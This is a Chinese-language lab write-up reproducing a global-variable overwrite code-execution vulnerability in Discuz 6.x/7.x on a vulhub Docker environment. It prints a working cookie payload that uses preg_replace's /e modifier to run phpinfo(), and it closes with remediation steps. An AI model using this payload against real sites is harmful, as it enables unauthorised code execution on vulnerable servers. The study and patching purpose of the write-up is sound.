Discuz 6、7 版本存在全域性變數防禦繞過導致程式碼執行漏洞
Discuz 6、7 版本存在全域性變數防禦繞過導致程式碼執行漏洞
影響版本:6.x、7.x
產生原因:由於php5.3.x版本里php.ini的設定裡request_order
預設值為GP,導致$_REQUEST
中不再包含$_COOKIE
,我們通過在Cookie中傳入$GLOBALS
來覆蓋全域性變數,造成程式碼執行漏洞。
前置條件: php5.3、php5.6
使用vulhub靶場復現此漏洞
構建環境
docker-compose up -d
訪問
http://yourip:8080/
訪問以下路徑,進行安裝
http://yourip:8080/install
資料服務庫伺服器:db,使用者名稱root,密碼root
安裝成功,進入discuz首頁,如圖:
進入預設模組如下圖:
進入任何一個帖子,抓取資料包,在cookie中構造pyload
GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();
如下圖:
結果成功執行了命令,返回了php環境資訊,如下圖:
漏洞修復
1、修改php.ini配置引數 request_order = “CGP”
2、升級discuz版本
相關文章
- Discuz! X系列遠端程式碼執行漏洞分析
- WordPress File Manager 存在任意程式碼執行漏洞,騰訊T-Sec Web應用防火牆已支援防禦Web防火牆
- Windows漏洞:MS08-067遠端程式碼執行漏洞復現及深度防禦Windows
- Webscan360的防禦與繞過Web
- python多執行緒-共享全域性變數Python執行緒變數
- 微軟審查發現Perforce Helix Core Server存在四個漏洞,可導致遠端程式碼執行微軟Server
- xss原理繞過防禦個人總結
- Acer和華碩電腦漏洞曝光,可導致任意程式碼執行
- 靜態全域性變數和全域性變數變數
- Jmeter-全域性變數跨執行緒組使用JMeter變數執行緒
- 眾至科技:漏洞通告 | 微軟10月釋出多個安全漏洞;Apache Shiro許可權繞過漏洞;Apache Commons存在程式碼執行漏洞微軟Apache
- 嚴重 PHP 漏洞導致伺服器遭受遠端程式碼執行PHP伺服器
- 全域性變數變數
- 追求程式碼質量: 用 AOP 進行防禦性程式設計程式設計
- 用友-NC-Cloud存在控制檯繞過漏洞Cloud
- 多執行緒中,區域性變數與全域性變數哪個比較安全?執行緒變數
- 新的PHP高危漏洞可導致黑客執行遠端程式碼攻擊PHP黑客
- 防禦性程式設計與瘋狂偏執性程式設計程式設計
- node 全域性物件和全域性變數物件變數
- 全域性變數與區域性變數變數
- 區域性變數和全域性變數變數
- VMwareMac版本漏洞可任意執行惡意程式碼REMMac
- 全域性 DOM 變數變數
- lua全域性變數變數
- 【檔案上傳繞過】路徑拼接問題導致上傳漏洞
- C語言區域性變數、全域性變數、靜態區域性變數、靜態全域性變數C語言變數
- angular中定義全域性變數及全域性變數的使用Angular變數
- 程式程式碼,常量,區域性變數,全域性變數在記憶體中的儲存位置變數記憶體
- 記一次,因表變數導致SQL執行效率變慢變數SQL
- Java區域性變數與全域性變數Java變數
- java 全域性變數和區域性變數Java變數
- JavaScript —— 區域性變數和全域性變數JavaScript變數
- jmeter全域性變數和區域性變數JMeter變數
- 【c】全域性變數與區域性變數變數
- 網站漏洞檢測 squid反向代理存在遠端程式碼執行漏洞網站UI
- vue定義全域性變數和全域性方法Vue變數
- 安全人員發現 SELinux 防禦可被輕易繞過Linux
- js宣告全域性變數JS變數